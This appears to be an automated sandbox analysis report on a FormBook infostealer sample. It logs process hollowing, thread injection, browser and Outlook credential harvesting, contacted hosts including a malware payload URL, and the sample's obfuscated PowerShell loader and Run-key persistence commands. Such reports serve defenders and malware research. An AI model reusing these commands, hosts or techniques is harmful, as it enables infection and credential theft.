Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtAllocateVirtualMemory: Direct from: 0x77672BEC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtDeviceIoControlFile: Direct from: 0x77672AEC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQuerySystemInformation: Direct from: 0x776748CC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQueryAttributesFile: Direct from: 0x77672E6C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtSetInformationThread: Direct from: 0x77672B4C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtOpenSection: Direct from: 0x77672E0C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQueryVolumeInformationFile: Direct from: 0x77672F2C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtAllocateVirtualMemory: Direct from: 0x776748EC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtSetInformationThread: Direct from: 0x776663F9 Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtReadVirtualMemory: Direct from: 0x77672E8C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtCreateKey: Direct from: 0x77672C6C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtWriteVirtualMemory: Direct from: 0x7767490C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtAllocateVirtualMemory: Direct from: 0x77673C9C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtDelayExecution: Direct from: 0x77672DDC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtCreateUserProcess: Direct from: 0x7767371C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQuerySystemInformation: Direct from: 0x77672DFC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQueryInformationProcess: Direct from: 0x77672C26 Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtResumeThread: Direct from: 0x77672FBC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtReadFile: Direct from: 0x77672ADC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtAllocateVirtualMemory: Direct from: 0x77672BFC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtResumeThread: Direct from: 0x776736AC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtSetInformationProcess: Direct from: 0x77672C5C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtMapViewOfSection: Direct from: 0x77672D1C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtNotifyChangeKey: Direct from: 0x77673C2C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtWriteVirtualMemory: Direct from: 0x77672E3C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtCreateMutant: Direct from: 0x776735CC Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 2180 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Overfondle.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Overfondle.exe base: 1660000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Overfondle.exe base: 19FFF4 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)" Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "hakkebrttet" /t reg_expand_sz /d "%elaf% -windowstyle minimized $ultramicrotome=(get-itemproperty -path 'hkcu:\noncoherent\').skvadredes;%elaf% ($ultramicrotome)"
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "hakkebrttet" /t reg_expand_sz /d "%elaf% -windowstyle minimized $ultramicrotome=(get-itemproperty -path 'hkcu:\noncoherent\').skvadredes;%elaf% ($ultramicrotome)" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_6EAC1096 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,lstrcmpiA,lstrcmpiA,DeleteFileA,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,RpcServerRegisterIf3,CreateProcessA,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalFree,GetTickCount,WaitForSingleObject,GetExitCodeProcess,RpcServerRegisterIf3,PeekNamedPipe,GetTickCount,ReadFile,lstrcpyA,GlobalReAlloc,lstrcpyA,GetTickCount,TerminateProcess,lstrcpyA,Sleep, 0_2_6EAC1096
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Manager
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033B3

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431789 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 51 www.n-benriya002.com 2->51 53 www.ejbodyart.com 2->53 55 4 other IPs or domains 2->55 81 Multi AV Scanner detection for domain / URL 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus detection for URL or domain 2->85 87 5 other signatures 2->87 11 SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe 26 2->11         started        signatures3 process4 file5 45 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 11->45 dropped 47 C:\Users\user\...\Afvrgningernes.Ign37, ASCII 11->47 dropped 99 Suspicious powershell command line found 11->99 15 powershell.exe 20 11->15         started        signatures6 process7 file8 49 C:\Users\user\AppData\...\Overfondle.exe, PE32 15->49 dropped 65 Obfuscated command line found 15->65 67 Writes to foreign memory regions 15->67 69 Sample uses process hollowing technique 15->69 71 2 other signatures 15->71 19 Overfondle.exe 2 7 15->19         started        23 conhost.exe 15->23         started        25 cmd.exe 1 15->25         started        signatures9 process10 dnsIp11 57 kraljevikonaci.rs 195.252.110.253, 443, 49706 BEOTEL-AShttpwwwbeotelnetRS Serbia 19->57 89 Multi AV Scanner detection for dropped file 19->89 91 Machine Learning detection for dropped file 19->91 93 Maps a DLL or memory area into another process 19->93 27 rmGjiHyfWQcajCGtrYkAoHJJOdK.exe 19->27 injected 30 cmd.exe 1 19->30         started        signatures12 process13 signatures14 97 Found direct / indirect Syscall (likely to bypass EDR) 27->97 32 cmd.exe 13 27->32         started        35 conhost.exe 30->35         started        37 reg.exe 1 1 30->37         started        process15 signatures16 73 Tries to steal Mail credentials (via file / registry access) 32->73 75 Tries to harvest and steal browser information (history, passwords, etc) 32->75 77 Modifies the context of a thread in another process (thread injection) 32->77 79 2 other signatures 32->79 39 rmGjiHyfWQcajCGtrYkAoHJJOdK.exe 32->39 injected 43 firefox.exe 32->43         started        process17 dnsIp18 59 n-benriya002.com 219.94.128.41, 49712, 80 SAKURA-CSAKURAInternetIncJP Japan 39->59 61 www.jt-berger.store 217.160.0.183, 49708, 49709, 49710 ONEANDONE-ASBrauerstrasse48DE Germany 39->61 63 ejbodyart.com 112.175.50.218, 49707, 80 KIXS-AS-KRKoreaTelecomKR Korea Republic of 39->63 95 Found direct / indirect Syscall (likely to bypass EDR) 39->95 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
219.94.128.41
 n-benriya002.com Japan 9371 SAKURA-CSAKURAInternetIncJP false
195.252.110.253
 kraljevikonaci.rs Serbia
6700 BEOTEL-AShttpwwwbeotelnetRS false
217.160.0.183
 www.jt-berger.store Germany
8560 ONEANDONE-ASBrauerstrasse48DE false
112.175.50.218
 ejbodyart.com Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false

Contacted Domains

Name IP Active
ejbodyart.com 112.175.50.218 true
n-benriya002.com 219.94.128.41 true
www.jt-berger.store 217.160.0.183 true
kraljevikonaci.rs 195.252.110.253 true
www.ejbodyart.com unknown unknown
www.n-benriya002.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.jt-berger.store/9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1 false
  • Avira URL Cloud: safe
 unknown
https://kraljevikonaci.rs/ETfFmOW246.bin false
  • 15%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://www.jt-berger.store/9pdo/ false
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.n-benriya002.com/9pdo/ false
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.ejbodyart.com/9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1 false
  • Avira URL Cloud: safe
 unknown